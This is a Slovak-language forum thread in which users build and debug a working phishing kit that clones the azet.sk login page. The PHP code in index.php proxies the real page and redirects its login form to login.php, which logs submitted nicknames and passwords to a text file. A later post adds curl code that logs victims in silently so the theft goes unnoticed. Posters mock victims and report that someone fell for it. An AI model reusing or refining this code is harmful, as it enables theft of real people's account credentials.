Phishing

Anti

Snazim sa vyskusat phishing.
Na servere webzdarma.cz som vytvoril tieto subory :

index.php

<?
$open=FOpen("http://azet.sk/","r"); // otvoríme súbor na čítanie
$read=FRead($open,filesize("http://azet.sk/")); // prečítame ju a uložíme do premennej read
FClose($open); // zatvoríme súbor
$nahradene=str_replace("http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3","login.php",$read); // Nahradíme login súbor azetu za náš za náš súbor
echo $nahradene; // a teraz to celé zobrazíme
?>

login.php

Kód: Vybrať všetko

<?
$open=FOpen("hesla.dat","a"); // otvoríme súbor pre zápis na koniec
FWrite($_POST['nick']." > ".$_POST['heslo']."\n"); // zapíšeme údaje
FClose($open); // zatvoríme súbor
header("location: http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3&nick=".$_POST['nick']."&heslo=".$_POST['heslo']); // presmerujeme na skutočný login azetu
?>

Po pristupe na stranku sa vypise tato chyba :

Kód: Vybrať všetko

Warning: filesize(): Stat failed for http://azet.sk/ (errno=2 - No such file or directory) in /3w/wz.cz/p/site/phishing/index.php on line 3

Neviete niekto v com je problem ?

final

heh, nesvrbí svedomie?

zameň ten fread na

Kód: Vybrať všetko

while(!feof($open))
{
$read .= fread($open,1024);
}

Anti

nesvrbi

to je len na studijne ucely

diky moc

Dawn

Co je to phishing?

Anti

skus pouzit googla

Kód: Vybrať všetko

http://www.google.sk/search?hs=5Vm&hl=sk&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=phishing&btnG=H%C4%BEada%C5%A5&meta=lr%3Dlang_sk

Kód: Vybrať všetko

http://www.dsl.sk/article.php?article=1826&title=

Dawn

Finalway napísal:heh, nesvrbí svedomie?

zameň ten fread na
Kód: Vybrať všetko
while(!feof($open))
{
$read .= fread($open,1024);
}

Nejde ani toto vypíše to kravinu

Anti

teraz to je funkcne :

------index.php-------

Kód: Vybrať všetko

<?
$open=FOpen("http://azet.sk/","r"); // otvoríme súbor na čítanie
while(!feof($open))
{
$read .= fread($open,1024);
} 
FClose($open); // zatvoríme súbor
$nahradene=str_replace("http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3F","login.php",$read); // Nahradíme login súbor azetu za náš za náš súbor
echo $nahradene; // a teraz to celé zobrazíme
?>

----login------

Kód: Vybrať všetko

<?
$file = @FOpen("hesla.txt", "r");
$data = @FRead($file,FileSize("hesla.txt"));
@FClose($file);

$file = FOpen("hesla.txt", "w");
FWrite($file,$data.$nick." : ".$heslo."\n");
FClose($file);
header("location: http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3&nick=");
?>

gwixt

uz len prinutit ludi aby chodili na azet cez teba

caesar1987

tak to by som chcel vediet, ako ich donuti...

Anti

ludia su hlupi

Pufo Callo

asi tak ale aj mudry sa mi nato chytil. Good idea dik za kod

final

si to mohol ešte vylepšiť, že po zápise hesla nepresmeruje na azet login, ale hneď prihlási..

Kód: Vybrať všetko

http://moje.azet.sk/prihlasenie.phtml?Miestnost.phtml~&nick=abc&heslo=xyz

ak to ešte nezmenili a berie to GET, ak to zmenili, stačí napr. s curl() postovať premenné..

btw, ľudia sú hlúpejší ako sa zdá, ja som toto robil asi 3 roky dozadu, ale smiechu až až

MAker

A ako sa dajú pomocou curl() postovať premenné?

... · Príspevok od používateľa **...** » 13 máj 2006, 15:14

MAker napísal:A ako sa dajú pomocou curl() postovať premenné?

...v tomto pripade nijako, Finalway je mimo.

final

MAker napísal:A ako sa dajú pomocou curl() postovať premenné?

Kód: Vybrať všetko

<?
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL,'http://moje.azet.sk/prihlasenie.phtml?Miestnost.phtml~');
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'nick=aaa&heslo=bbb');
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
$op = curl_exec($curl);
echo($op);
?>

... : pls, nechodievaj radšej do tejto sekcie, lebo jediný kto je mimo si ty..

MAker

Finalway napísal:

Kód: Vybrať všetko

<?
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL,'http://moje.azet.sk/prihlasenie.phtml?Miestnost.phtml~');
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'nick=aaa&heslo=bbb');
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
$op = curl_exec($curl);
echo($op);
?>

Skúšal som to na webzdarma a vypísalo mi to iba toto:

Kód: Vybrať všetko

Fatal error: Call to undefined function: curl_init() in /3w/mysteria.cz/m/maker/send.php on line 10

. Na ic.cz mi napísalo

Kód: Vybrať všetko

Warning: curl_init() has been disabled for security reasons in /home/free/ic.cz/m/maker2807/root/www/send.php on line 10

Nepoznáš nejaký free hosting, kde by to fungovalo?

final

uf, nepoznám, ja takéto veci púšťam len cez localhost..

ak to potrebuješ používať, tak si zaobstaraj nejaký.. alebo to sprav ako chalani spomenuli -> http://hojko.com/viewtopic.php?t=50263

neviem ako wz.cz sa k tomuto stavia, ale ic.cz to berie v poho..

amater_

co je to vlastne ten localhost?

amater_ napísal:co je to vlastne ten localhost?

http://en.wikipedia.org/wiki/Localhost

Dawn

MAker napísal:Skúšal som to na webzdarma a vypísalo mi to iba toto:
Kód: Vybrať všetko
Fatal error: Call to undefined function: curl_init() in /3w/mysteria.cz/m/maker/send.php on line 10
. Na ic.cz mi napísalo
Kód: Vybrať všetko
Warning: curl_init() has been disabled for security reasons in /home/free/ic.cz/m/maker2807/root/www/send.php on line 10
Nepoznáš nejaký free hosting, kde by to fungovalo?

Vypísalo ti to preto lebo to čo si tam skopíroval bol ešte ten zlý kód...
Skús použiť už ten upravený...

a ide to bezproblemov aj na wz.cz